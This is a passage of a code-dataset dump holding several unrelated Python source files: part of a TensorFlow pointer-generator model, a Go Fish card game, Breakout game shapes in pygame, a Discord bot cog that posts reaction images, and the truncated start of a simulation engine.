tf.stack(final_dists,axis=1), dec_hidden, context_vector,tf.stack(attentions,1), tf.stack(p_gens,1)\n\n\n def calc_final_dist(self,predictions, attentions, p_gens, batch_oov_len, extended_enc_inp):\n '''\n Get the final distribution\n :param predictions.shape (max_dec_len,batch_size,vocab_size)\n :param attentions.shape (max_dec_len+1,batch_size,max_enc_len)\n :param p_gens.shape (max_dec_len,batch_size,1)\n :param batch_oov_len.shape 
(batch_size,)\n :param extended_enc_inp.shape (batch_size,max_enc_len)\n '''\n vocab_dists = [p_gen * predict for (p_gen,predict) in zip(p_gens,predictions)] # vocab_dists.shape (max_dec_len-1,batch_size,vocab_size)\n attn_dists = [(1-p_gen) * attn for (p_gen,attn) in zip (p_gens,attentions[:-1])]\n\n # Concatenate some zeros to each vocabulary dist, to hold the probabilities for in-article OOV words\n batch_oov_len = tf.math.reduce_max(batch_oov_len,axis=-1).numpy()\n extended_size = self.vocab_size + batch_oov_len\n extra_zeros = tf.zeros((self.batch_size,batch_oov_len))\n vocab_dists_extended = [tf.concat([dist,extra_zeros],axis=1) for dist in vocab_dists] # vocab_dists_extended.shape (max_dec_len,batch_size,extended_size)\n\n # Project the values in the attention distributions onto the appropriate entries in the final distributions.\n batch_nums = tf.range(0,limit=self.batch_size)\n batch_nums = tf.expand_dims(batch_nums,axis=1) # batch_nums.shape (batch_size,1)\n attn_len = tf.shape(extended_enc_inp)[1]\n batch_nums = tf.tile(batch_nums,[1,attn_len]) # batch_nums.shape (batch_size,max_enc_len)\n indices = tf.stack((batch_nums,extended_enc_inp),axis=2) # indices.shape (batch_size,max_enc_len,2)\n shape = [self.batch_size,extended_size]\n attn_dists_projected = [tf.scatter_nd(indices,copy_dist,shape) for copy_dist in attn_dists]\n final_dists = [vocab_dist + copy_dist for (vocab_dist, copy_dist) in zip(vocab_dists_extended, attn_dists_projected)]\n\n return final_dists # final_dists.shape (max_dec_len,batch_size,extended_size)\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n params=get_params()\n embedding_matrix=load_embedding_matrix()\n vocab=Vocab()\n pgn=PGN(params,embedding_matrix,vocab)","repo_name":"qchenwhy006/Car-diagnostic-report-analysis-Chinese-Version-","sub_path":"model_layers/PGN_Coverage.py","file_name":"PGN_Coverage.py","file_ext":"py","file_size_in_byte":5814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"13610863796","text":"from src.GoFish import Deck\nfrom src.GoFish.player import *\nimport random\n#march 17\ndef RepresentsInt(s):\n try:\n int(s)\n return True\n except ValueError:\n return False\n\nclass Game():\n def __init__(self, players, computers):\n self.maxplayers = 4\n if (players + computers) > self.maxplayers:\n raise Exception(\"There can only be \" + str(self.maxplayers) + \" players\")\n if (players + computers) <= 1:\n raise Exception(\"Must have at least 2 players\")\n self.players = []\n self.deck = Deck.deck(True)\n # print (len(self.deck.facedown))\n # for card in self.deck.facedown:\n # print(card.value)\n # print(card.suit)\n self.inPlay = True\n\n\nclass GoFish(Game):\n def __init__(self, players, computers):\n print('Welcome to GoooooooooFish')\n print('---------------------------------------------------------------')\n super().__init__(players, computers)\n for i in range(0, players):\n self.players.append(GoFishPlayer(False, i, 0))\n for i in range(0, computers):\n self.players.append(GoFishPlayer(True, i, 0))\n self.playerCount = len(self.players)\n\n def getPlayerChoicesAndPrint(self, player):\n choicesDic = {}\n iterator = 1\n for p in self.players:\n if not p.__eq__(player):\n choicesDic[iterator] = p\n iterator += 1\n\n for k in choicesDic.keys():\n print(str(k) + ' ' + choicesDic[k].name)\n\n return choicesDic\n\n def ask(self, player, otherPlayer, cardRank):\n print('Asking ' + otherPlayer.name + ' for card...')\n if otherPlayer.checkForCardByRank(cardRank):\n cardsReceived = otherPlayer.giveUpAllCardsByRank(cardRank)\n for c in cardsReceived:\n player.hand.append(c)\n print(\"Player \" + otherPlayer.name + \" has given you \" + str(len(cardsReceived)) + \" of Rank \" + str(cardRank.name))\n else:\n print(\"Player \" + otherPlayer.name + \" does not have the card you asked for. Go fish!\")\n drawn = self.deck.drawCardFromTopOfDeck()\n player.hand.append(drawn)\n print(\"You have drawn \" + drawn.value.name + ' of ' + drawn.suit.name + \" from the deck.\")\n\n def computerTurn(self, player):\n turnString = '\\n' + player.name + '\\'s turn'\n print(turnString)\n print('********************************')\n if player.isEmptyHand():\n print(\"You have no cards to play! Drawing one card from the top of the deck...\")\n player.hand.append(self.deck.drawCardFromTopOfDeck())\n player.displayHand()\n print(\"Which card would you like to ask for? (Please type the number beside the card you want to ask for (Ex: 1))\")\n print('>')\n want = player.computerPickACard()\n print(\"Who would you like to ask? (Please type a number)\")\n otherPlayers = self.getPlayerChoicesAndPrint(player)\n print('>')\n who = random.randint(1, len(self.players) - 1)\n # error checking\n otherPlayer = otherPlayers[who]\n self.ask(player, otherPlayer, want)\n player.sortHandByRank()\n\n # removes any books in hand\n player.checkForBook()\n\n # Empty deck: END OF GAME\n if self.deck.isEmpty():\n print(\"The draw pile is now empty.\")\n self.inPlay = False\n\n # find players' max number of books\n max = 0\n winners = []\n for i in range(self.playerCount):\n if self.players[i].num_books > max:\n max = self.players[i].num_books\n # check for a tie\n for i in range(self.playerCount):\n if self.players[i].num_books == max:\n winners.append(self.players[i])\n #announce the winner(s)\n names = []\n for w in winners:\n names.append(w.name)\n print(str(names) + \" have \" + str(max) + \" book(s). 
\" + str(names) + \" win!\")\n\n def turn(self, player):\n turnString = '\\n' + player.name + '\\'s turn'\n print(turnString)\n print('********************************')\n if player.isEmptyHand():\n print(\"You have no cards to play! Drawing one card from the top of the deck...\")\n player.hand.append(self.deck.drawCardFromTopOfDeck())\n player.displayHand()\n print(\"Which card would you like to ask for? (Please type the number beside the card you want to ask for (Ex: 1))\")\n print('>')\n want = sys.stdin.readline()\n while not RepresentsInt(want):\n print('input must be numeric value...try again\\n>')\n want = sys.stdin.readline()\n want = int(want)\n while (want < 1) or (want > len(player.hand)):\n print('choice must be a card that is in your hand')\n while not RepresentsInt(want):\n print('input must be numeric value...try again\\n>')\n want = sys.stdin.readline()\n want = int(want)\n want = player.hand[want - 1].value\n print(\"Who would you like to ask? (Please type a number)\")\n otherPlayers = self.getPlayerChoicesAndPrint(player)\n print('>')\n who = sys.stdin.readline()\n while not RepresentsInt(who):\n print('input must be numeric value...try again\\n>')\n who = sys.stdin.readline()\n who = int(who)\n # error checking\n while who not in otherPlayers.keys():\n print(\"Invalid player. Please enter the number of the player you would like to ask.\")\n print('>')\n who = sys.stdin.readline()\n while not RepresentsInt(who):\n print('input must be numeric value...try again\\n>')\n who = sys.stdin.readline()\n who = int(who)\n otherPlayer = otherPlayers[who]\n self.ask(player, otherPlayer, want)\n player.sortHandByRank()\n\n # removes any books in hand\n player.checkForBook()\n\n # Empty deck: END OF GAME\n if self.deck.isEmpty():\n print(\"The draw pile is now empty.\")\n self.inPlay = False\n\n # find players' max number of books\n max = 0\n winners = []\n for i in range(self.playerCount):\n if self.players[i].num_books > max:\n max = self.players[i].num_books\n # check for a tie\n for i in range(self.playerCount):\n if self.players[i].num_books == max:\n winners.append(self.players[i])\n #announce the winner(s)\n names = []\n for w in winners:\n names.append(w.name)\n print(str(names) + \" have \" + str(max) + \" book(s). \" + str(names) + \" win!\")\n else:\n print('Your hand is now:')\n player.displayHand()\n\n\n def run(self):\n # Deal cards\n for i in range(self.playerCount):\n for j in range(5): # each player gets 5 cards\n self.players[i].hand.append(self.deck.drawCardFromTopOfDeck())\n\n for p in self.players:\n p.sortHandByRank()\n while self.inPlay:\n for i in range(self.playerCount):\n if self.players[i].ai:\n self.computerTurn(self.players[i])\n else:\n self.turn(self.players[i])\n if not self.inPlay:\n return self.players[i]\n","repo_name":"gtstewar/CSC495","sub_path":"src/GoFish/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":7612,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"12666211197","text":"import pygame\n\nclass Shape():\n def __init__(self, xvalue, yvalue, width, height, color=None):\n if color == None:\n self._color = (255,255,255)\n else:\n self._color = color\n self._shape = pygame.Rect(xvalue,yvalue,width,height)\n\n\n #Defualt draw\n def draw(self, screen):\n pygame.draw.rect(screen,self._color,self._shape)\n\n\nclass Ball(Shape):\n BALL_VELOCITY = 5\n def __init__(self, xvalue, yvalue, width, height, color=None):\n self._velocity = [0,0]\n super().__init__(xvalue,yvalue,width,height,color)\n\n def start_velocity(self):\n self._velocity = [-self.BALL_VELOCITY, -self.BALL_VELOCITY]\n\n #Override draw to draw a circle\n def draw(self, screen):\n pygame.draw.circle(screen,self._color,(self._shape.centerx,self._shape.centery),int(self._shape.width/2))\n\n def xvelocity(self):\n return self._velocity[0]\n\n def yvelocity(self):\n return self._velocity[1]\n\n # Add a function called update_xvelocity(xvelocity) that updates the balls xvelocity with the given value\n def update_xvelocity(self, xvelocity):\n self._velocity[0]= xvelocity\n # Add a function called update_yvelocity(yvelocity) that updates the balls yvelocity with the given value\n def update_yvelocity(self, yvelocity):\n self._velocity[1]= yvelocity\n\n #Create an update_position method that changes the xvalue and yvalue of the ball based on the velocity\n def update_position(self, position = None):\n if position == None:\n self._shape = self._shape.move(self._velocity[0],self._velocity[1])\n else:\n self._shape.left = position[0]\n self._shape.top = position[1]\n\n def update_positionx(self, x = None):\n if x == None:\n self._shape = self._shape.move(self._velocity[0], 0)\n else:\n self._shape = self._shape.move(x, 0)\n\n def update_positiony(self, y = None):\n if y == None:\n self._shape = self._shape.move(0, self._velocity[1])\n else:\n self._shape = self._shape.move(0, y)\n\n def _check_collision_shape(self,brick):\n return (brick._shape.top <= self._shape.top <= brick._shape.bottom or brick._shape.top <= self._shape.bottom <= brick._shape.bottom)and (brick._shape.left <= self._shape.right <= brick._shape.right or brick._shape.left <= self._shape.left <= brick._shape.right)\n\n def checkhandle_collision_brickx(self,brick):\n if brick._shape.top <= self._shape.top <= brick._shape.bottom or brick._shape.top <= self._shape.bottom <= brick._shape.bottom:\n #hit from left\n if brick._shape.left <= self._shape.right <= brick._shape.right:\n self.update_xvelocity(self.xvelocity()*-1)\n self._shape.right = brick._shape.left-1\n return True\n #hit from right\n elif brick._shape.left <= self._shape.left <= brick._shape.right:\n self.update_xvelocity(self.xvelocity() * -1)\n self._shape.left = brick._shape.right + 1\n return True\n return False\n\n def checkhandle_collision_bricky(self,brick):\n if brick._shape.left <= self._shape.right <= brick._shape.right or brick._shape.left <= self._shape.left <= brick._shape.right:\n #Hit from Bottom\n if brick._shape.top <= self._shape.top <= brick._shape.bottom:\n self.update_yvelocity(self.yvelocity()*-1)\n self._shape.top = brick._shape.bottom+1\n return True\n #Hit from Top\n if brick._shape.top <= self._shape.bottom <= brick._shape.bottom:\n self.update_yvelocity(self.yvelocity() * -1)\n self._shape.bottom = brick._shape.top - 1\n return True\n return False\n\n\n def checkhandle_collision_paddley(self, paddle):\n #Check to see if ball can hit paddle\n if self._shape.bottom >= paddle._shape.top >= self._shape.top:\n if paddle._shape.left <= 
self._shape.right <= paddle._shape.right or paddle._shape.left <= self._shape.left <= paddle._shape.right:\n self._shape.bottom = paddle._shape.top +1\n self.update_yvelocity(self.yvelocity() * -1)\n # Update x velocity based of where ball hit paddle\n x = self._shape.centerx - paddle._shape.centerx\n xvelocitychange = (x* self.BALL_VELOCITY)/(paddle._shape.width/2)\n xvelocitychange = round(xvelocitychange)\n self.update_xvelocity(self.xvelocity()+ int(xvelocitychange))\n\n def checkhandle_collision_wallx(self, x):\n #Modify Method to return true if ball hits the bottom of the screen else false\n if self._shape.left <= 0:\n self._shape.left = 1\n self.update_xvelocity(self._velocity[0]*-1)\n elif self._shape.right >= x:\n self._shape.right = x - 1\n self.update_xvelocity(self._velocity[0]*-1)\n\n def checkhandle_collision_wally(self,y):\n if self._shape.top <= 0:\n self._shape.top = 1\n self.update_yvelocity(self._velocity[1]*-1)\n elif self._shape.bottom >= y:\n return True\n\n return False\n\n\nclass Paddle(Shape):\n #Create a update_position method for the paddle that takes in an xchange value and calls self.shape.move(xchange, 0)\n def update_position(self, xchange, window_width):\n if xchange + self._shape.left < 0 :\n self._shape.left = 0\n elif xchange + self._shape.right > window_width:\n self._shape.right = window_width\n else:\n self._shape = self._shape.move(xchange,0)\n","repo_name":"calvinkranig/breakout","sub_path":"MainGame/shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41476643896","text":"#!/usr/bin/env python3\n\n\"\"\"Contains a cog for various weeb reaction commands.\"\"\"\n\n# Standard modules\nimport logging\nimport random\n\n# Third-party modules\nimport discord\nfrom discord.ext import commands\n\n# Bundled modules\nimport checks\nimport helpers\nimport utils\n\nlogger = logging.getLogger(__name__)\n\nsystemrandom = random.SystemRandom()\n\n# Base URL strings for RRA API.\nBASE_URL_API = \"https://rra.ram.moe/i/r?type={0}\"\nBASE_URL_IMAGE = \"https://cdn.ram.moe{0[path]}\"\n\n# Single image links.\nIMAGE_FACEDESK = \"https://media.tumblr.com/tumblr_lqegp8wjxZ1qktqch.gif\"\nIMAGE_LMLU = \"https://68.media.tumblr.com/tumblr_mej070O7Lj1qktqch.gif\"\nIMAGE_WLOL = \"https://68.media.tumblr.com/tumblr_lqehb0eOK01qktqch.jpg\"\n\n# Tuples of image links.\nIMAGES_BOOTS = ((\"https://media-cache-ak0.pinimg.com/736x/db/b9/a3/\"\n \"dbb9a30cc312682ee2d2cc4cf84310ae.jpg\"),\n \"https://www.polyvore.com/cgi/img-thing?.out=jpg&size=l&tid=21163978\",\n \"https://i.imgur.com/3Y4r38i.jpg\",\n \"https://i.imgur.com/Jj0eZTh.png\",\n \"https://i.imgur.com/EC4UXCI.jpg\")\nIMAGES_DEAD = ((\"https://s-media-cache-ak0.pinimg.com/736x/ec/61/ef/\"\n \"ec61ef110a5d2e01bf8ae48331b63723.jpg\"),\n \"http://safebooru.org/images/2048/60ce6f6888ba2fce6393638223dcc8d7c67f0655.jpg\",\n \"https://i.giphy.com/xT1XGLm7CJknNZKVS8.gif\")\nIMAGES_GLOMP = (\"http://safebooru.org/images/1575/8e2b95aefa17208aa5b5bc2aa687a8d791adf20a.gif\",\n \"http://safebooru.org/images/1860/e8562c569fb94477671947ad96a0b88ac999569a.gif\",\n \"http://safebooru.org/images/579/cd1913e6aaa91bb3abb752ebd9fb410099396acd.gif\",\n (\"http://safebooru.org/samples/2095/\"\n \"sample_c1fc61605ea086c339d0b8376efbfb83003d1a96.jpg\"))\nIMAGES_IDK = (\"http://safebooru.org/images/1513/6198de35cc3a7ffb2bd5cd46a89ca91fb117b3db.gif\",\n \"http://safebooru.org/images/2098/bbe8b8f0fc5b630133d10a16bbeb29b81d64db50.jpg\",\n \"http://safebooru.org/images/1977/e3988fa3bb6125f77b8e55d648ab1aebdd317bc7.jpg\",\n \"http://safebooru.org/samples/1768/sample_2bf2f0acc1c06e34deef043066ebb17c21de4238.jpg\",\n \"http://safebooru.org/images/937/ae704e58e0d58ddf57d3793609f9994a2b831301.jpg\")\nIMAGES_WAGGING = (\"http://safebooru.org/images/146/78639fe8edd6cb75a0f031b4dfb0773fdda6b4e8.jpg\",\n \"http://safebooru.org/images/763/2136ae257bb49f34552070d566b9eb23884a48c4.jpg\",\n \"http://safebooru.org/images/599/7fc582995b8fa21555791bfed382f0f634ca3cbb.jpg\",\n \"http://safebooru.org/images/275/3c5368c8f7bd3795052ce38ae860c9fa4b97f473.gif\",\n \"http://safebooru.org/images/1990/96b8cf2274c20df69c3ba04d4a3a6647cb07a3f0.gif\",\n \"http://safebooru.org/images/824/c271151ac920b664ed4de06d9770199f6d16d70f.gif\",\n \"http://safebooru.org/images/906/fae7d69ba34b74795546d58b322d33189fce8418.gif\",\n \"http://safebooru.org/images/1428/f5bcb191dfdd0881db66eb676b9f42df214629b0.gif\",\n \"http://safebooru.org/images/1891/5922d9fe102f8b2e62b2761eb505ee75fdcde2df.gif\",\n \"http://safebooru.org/images/1853/10962bdb8ffeda856e15882593788cd09e58ee2e.gif\",\n (\"http://68.media.tumblr.com/01e9cc48310fbe72b2ccf1b52925d0c4/\"\n \"tumblr_o3at2et2G31tydz8to1_540.gif\"),\n (\"https://lh3.googleusercontent.com/-rrPLI80iYmw/VQbtiyQhFwI/\"\n \"AAAAAAAA9Pg/XUGGf7yT6CY/w500-h273/tumblr_mmeanbZFmO1qg78wpo1_500.gif\"),\n (\"http://24.media.tumblr.com/a1d0298a6c2e7821ed102ad2345fcc4a/\"\n \"tumblr_myauniO7nO1r0wlweo1_500.gif\"),\n \"http://i.imgur.com/MSCtuve.gif\",\n (\"https://38.media.tumblr.com/8203abcf4aef7f528eb61206710bfdce/\"\n 
\"tumblr_nnwn56DQuR1ty38iao1_400.gif\"),\n (\"https://68.media.tumblr.com/c54e506582785a3e89d223fa3dba2fd6/\"\n \"tumblr_nyman1FuBi1tydz8to1_500.gif\"))\nIMAGES_LEWD = (\"https://i.imgur.com/5JZH78a.jpg\",\n \"https://i.imgur.com/RdQ3FFA.jpg\",\n \"https://i.imgur.com/98tad3K.gif\",\n \"https://i.imgur.com/8Dd399u.gif\",\n \"https://i.imgur.com/NbZ5Wgo.png\",\n \"https://i.imgur.com/aFHmenc.gif\",\n \"https://i.imgur.com/OsckzUL.png\",\n \"https://i.imgur.com/3EZyiLQ.jpg\",\n \"https://i.imgur.com/AaZvqcF.jpg\",\n \"https://i.imgur.com/XzQRDDl.jpg\",\n \"https://i.imgur.com/GTfWFm6.jpg\",\n \"https://i.imgur.com/Iz315vJ.jpg\",\n \"https://i.imgur.com/rWLoIzf.png\",\n \"https://secure.static.tumblr.com/753b4405d4c926ef8224e3ac5ec30aef/f52giag/4Uin6xuha/tumblr_static_tumblr_static_2p47ogg0mhus4gs8skwwcc8sw_640.gif\")\nIMAGES_LICK = (\"http://safebooru.org/images/189/0a412d1db7f53cd2505df9cf16be693dcac0855b.jpeg\",\n \"http://safebooru.org/images/358/f64d461f47319d8dae9adb899c0de24fca70127d.png\",\n \"http://safebooru.org/images/2116/4b8cf6a3f4cd38a610697df4f0fe1074e67070af.jpg\")\nIMAGES_POKE = (\"http://safebooru.org/images/1880/e3b020472d86b0a04ffec8cdf41049ef66cf3a68.gif\",\n \"http://safebooru.org/images/2051/031566980728255e6d7e2fba8c12a3c38ea7598a.gif\",\n \"http://safebooru.org/images/1169/3edae332d38c887a8723207d1bc0dffac8244591.gif\")\nIMAGES_SANDWICHES = (\"https://i.imgur.com/kyTDwIX.png\",\n \"https://i.imgur.com/ULKlVhU.png\",\n \"https://i.imgur.com/Z2RvlBx.png\",\n \"https://i.imgur.com/k5GnTbU.png\",\n \"https://i.imgur.com/SzuegH9.png\",\n \"https://i.imgur.com/ppcHtKd.png\",\n \"https://i.imgur.com/xy8iwN5.png\")\nIMAGES_KONKON = (\"http://safebooru.org/images/1856/6e6b3319f2a0a3fe5e77567ebdc998b3c4cb3900.jpg\",\n \"http://safebooru.org/samples/1832/sample_25adf8a37226fa003a6a6d7b0f3171f5764bba7d.jpg\",\n \"http://safebooru.org/images/1270/a9c1744fb4676f743c4dbc7668a39e72decdde16.jpg\",\n \"http://safebooru.org/images/2077/12bddb7bd2274f0ba9abe2d72c994555d562e0df.jpg\",\n (\"http://safebooru.org/samples/2045/\"\n \"sample_c2a906de7bf13b48c7c971e909f1beef75766c34.png\"))\nIMAGES_WAVE = (\"http://safebooru.org/images/2131/321680e22202367aebff73781458612269699518.jpg\",\n \"http://safebooru.org/images/531/94bee4c0ba0055eb531893c2b0b231e809b6a885.png\",\n \"http://safebooru.org/images/540/73530f81c9a2675df3ceb0faf0d4a6f97478b8a2.jpg\",\n \"http://safebooru.org/images/1753/93b7b450403c2d08cb73429356725242124fe5aa.png\",\n \"http://safebooru.org/images/1818/f9286e77a04f547d8da89349ebbdae8ad40286c0.jpg\",\n \"http://safebooru.org/images/1154/954c901ff38f9f294412c4f7cb416da42a5fdc05.jpg\")\nIMAGES_WHAT = (\"https://media.tumblr.com/tumblr_lnvtzjiY4J1qktqch.png\",\n \"https://owo.whats-th.is/a740f1.png\",\n \"http://media.tumblr.com/tumblr_lpob17Ru5v1qktqch.gif\")\n\nclass Reactions:\n \"\"\"Weeb reaction commands.\"\"\"\n\n def _generate_message(self, ctx, kind:str=None, user:discord.Member=None):\n \"\"\"Generate a message based on the user.\"\"\"\n if not kind or not user:\n message=\"\"\n elif ctx.bot.user.id == user.id:\n message=f\"Aw, thank you. Here, have one back. :3\"\n elif ctx.author.id != user.id:\n message=f\"**{user.display_name}**, you got a {kind} from **{ctx.author.display_name}!**\"\n else:\n message=f\"**{user.display_name}**, I'm so sorry. Have a {kind} anyway. 
:<\"\n return message\n\n async def _rra(self, ctx, kind:str, user:discord.Member=None):\n \"\"\"A helper function that grabs an image and posts it in response to a user.\n \n * kind - The type of image to retrieve.\n * user - The member to mention in the command.\"\"\"\n logger.info(f\"Fetching {kind} image.\")\n hash_id_channel = utils.to_hash(str(ctx.channel.id))\n url = BASE_URL_API.format(kind)\n async with ctx.bot.session.get(url) as response:\n if response.status == 200:\n data = await response.json()\n url_image = BASE_URL_IMAGE.format(data).replace(\"i/\", \"\")\n message = self._generate_message(ctx, kind, user)\n if not helpers.has_scanning(ctx):\n embed = discord.Embed(color=utils.random_color())\n embed.set_image(url=url_image)\n await ctx.send(message, embed=embed)\n else:\n message = \"\\n\".join([str(message), url_image])\n await ctx.send(message)\n else:\n message = \"Could not retrieve image. :(\"\n await ctx.send(message)\n logger.info(message)\n\n async def _send_image(self, ctx, url_image, kind:str=None, user:discord.Member=None):\n \"\"\"A helper function that creates an embed with an image and sends it off.\"\"\"\n if isinstance(url_image, (tuple, list)):\n url_image = systemrandom.choice(url_image)\n message = self._generate_message(ctx, kind, user)\n if not helpers.has_scanning(ctx):\n embed = discord.Embed(color=utils.random_color())\n embed.set_image(url=url_image)\n await ctx.send(message, embed=embed)\n else:\n message = \"\\n\".join([str(message), url_image])\n await ctx.send(message)\n\n # Commands based on _send_image()\n @commands.command(aliases=[\"rip\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def dead(self, ctx):\n \"\"\"Dead!\"\"\"\n await self._send_image(ctx, IMAGES_DEAD)\n\n @commands.command(aliases=[\"facedesk\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def fdesk(self, ctx):\n \"\"\"Facedesk!\"\"\"\n await self._send_image(ctx, IMAGE_FACEDESK)\n\n @commands.command(aliases=[\"tacklehug\", \"tackle\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def glomp(self, ctx, *, user:discord.Member):\n \"\"\"Glomp!\"\"\"\n await self._send_image(ctx, IMAGES_GLOMP, \"glomp\", user)\n\n @commands.command(aliases=[\"idek\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def idk(self, ctx):\n \"\"\"IDK!\"\"\"\n await self._send_image(ctx, IMAGES_IDK)\n\n @commands.command(aliases=[\"konkon\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def kon(self, ctx):\n \"\"\"Kon, kon!\"\"\"\n await self._send_image(ctx, IMAGES_KONKON)\n\n @commands.command(aliases=[\"lmly\", \"letmeloveyou\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def lmlu(self, ctx):\n \"\"\"Let me love you!\"\"\"\n await self._send_image(ctx, IMAGE_LMLU)\n\n @commands.command(aliases=[\"boop\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def poke(self, ctx, *, user:discord.Member):\n \"\"\"Poke!\"\"\"\n await self._send_image(ctx, IMAGES_POKE, \"poke\", user)\n\n @commands.command(aliases=[\"waving\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def wave(self, ctx):\n \"\"\"Wakarimasen, lol!\"\"\"\n await self._send_image(ctx, IMAGES_WAVE)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def what(self, ctx):\n \"\"\"What?\"\"\"\n await self._send_image(ctx, IMAGES_WHAT)\n\n @commands.command(aliases=[\"idu\", \"ideu\", \"wakarimasenlol\"])\n @commands.cooldown(6, 12, 
commands.BucketType.channel)\n async def wlol(self, ctx):\n \"\"\"Wakarimasen, lol!\"\"\"\n await self._send_image(ctx, IMAGE_WLOL)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def boots(self, ctx):\n \"\"\"Boots!\"\"\"\n await self._send_image(ctx, IMAGES_BOOTS)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def sandwich(self, ctx):\n \"\"\"Sandwich!\"\"\"\n await self._send_image(ctx, IMAGES_SANDWICHES)\n\n @commands.command(aliases=[\"tailwag\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def wag(self, ctx):\n \"\"\"Tail wag!\"\"\"\n await self._send_image(ctx, IMAGES_WAGGING)\n\n # Commands based on _rra()\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def cry(self, ctx):\n \"\"\"Cry!\"\"\"\n await self._rra(ctx, \"cry\")\n\n @commands.command(aliases=[\"snuggle\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def cuddle(self, ctx, *, user:discord.Member):\n \"\"\"Cuddle a user!\n \n * user - The user to be cuddled.\"\"\"\n await self._rra(ctx, \"cuddle\", user)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def hug(self, ctx, *, user:discord.Member):\n \"\"\"Hug a user!\n \n * user - The user to be hugged.\"\"\"\n await self._rra(ctx, \"hug\", user)\n \n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def kiss(self, ctx, *, user:discord.Member):\n \"\"\"Kiss a user!\n \n * user - The user to be kissed.\"\"\"\n await self._rra(ctx, \"kiss\", user)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def lewd(self, ctx):\n \"\"\"Lewd!\"\"\"\n choice = bool(systemrandom.getrandbits(1))\n if choice:\n await self._rra(ctx, \"lewd\")\n else:\n await self._send_image(ctx, IMAGES_LEWD)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def lick(self, ctx, *, user:discord.Member):\n \"\"\"Lick a user!\n \n * user - The user to be licked.\"\"\"\n if hasattr(ctx.channel, \"is_nsfw\") and ctx.channel.is_nsfw():\n await self._rra(ctx, \"lick\", user)\n else:\n await self._send_image(ctx, IMAGES_LICK, \"lick\", user)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def nom(self, ctx):\n \"\"\"Nom!\"\"\"\n await self._rra(ctx, \"nom\")\n\n @commands.command(aliases=['nya', 'meow'])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def nyan(self, ctx):\n \"\"\"Nyan!\"\"\"\n await self._rra(ctx, \"nyan\")\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def owo(self, ctx):\n \"\"\"owo\"\"\"\n await self._rra(ctx, \"owo\")\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def pat(self, ctx, *, user:discord.Member):\n \"\"\"Pat a user!\n \n * user - The user to be patted.\"\"\"\n await self._rra(ctx, \"pat\", user)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def pout(self, ctx):\n \"\"\"Pout!\"\"\"\n await self._rra(ctx, \"pout\")\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def slap(self, ctx, *, user:discord.Member):\n \"\"\"Slap a user!\n \n * user - The user to be slapped.\"\"\"\n await self._rra(ctx, \"slap\", user)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def smug(self, ctx):\n \"\"\"Smug!\"\"\"\n await 
self._rra(ctx, \"smug\")\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def stare(self, ctx, *, user:discord.Member):\n \"\"\"Stare at a user!\n \n * user - The user to be stared at.\"\"\"\n await self._rra(ctx, \"stare\", user)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def tickle(self, ctx, *, user:discord.Member):\n \"\"\"Tickle a user!\n \n * user - The user to be tickled.\"\"\"\n await self._rra(ctx, \"tickle\", user)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def triggered(self, ctx):\n \"\"\"Triggered!\"\"\"\n await self._rra(ctx, \"triggered\")\n\ndef setup(bot):\n \"\"\"Setup function for reaction images.\"\"\"\n bot.add_cog(Reactions())\n","repo_name":"sokcheng/Kitsuchan-NG","sub_path":"cogs/reactions.py","file_name":"reactions.py","file_ext":"py","file_size_in_byte":16335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"20925737913","text":"#!/usr/bin/python\n\"\"\"\n\\brief Discrete-event simulation engine.\n\n\\author Thomas Watteyne \n\\author Kazushi Muraoka \n\\author Nicola Accettura \n\\author Xavier Vilajosana \n\"\"\"\n\n#============================ logging =========================================\n\nimport random\nimport logging\nclass NullHandler(logging.Handler):\n def emit(self, record):\n pass\nlog = logging.getLogger('SimEngine')\nlog.setLevel(logging.ERROR)\nlog.addHandler(NullHandler())\n\n#============================ imports =========================================\n\nimport threading\n\nimport Propagation\nimport Topology\nimport Mote\nimport SimSettings\nimport ReSFEngine\nimport numpy as np\nimport math\nimport copy\n\n#============================ defines =========================================\n\n#============================ body ============================================\n\nclass SimEngine(threading.Thread):\n\n #===== start singleton\n _instance = None\n _init = False\n\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super(SimEngine,cls).__new__(cls, *args, **kwargs)\n return 